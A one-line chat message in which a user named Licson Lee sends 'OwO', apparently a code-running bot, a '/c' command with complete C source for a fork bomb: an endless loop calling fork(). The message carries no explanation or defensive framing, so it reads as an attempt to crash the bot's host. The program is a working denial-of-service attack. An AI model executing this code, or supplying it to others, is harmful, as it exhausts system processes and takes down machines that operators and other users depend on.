Licson Lee says to OwO
/c #include <stdio.h> #include <unistd.h> int main(){ while(1){ fork(); } return 0; }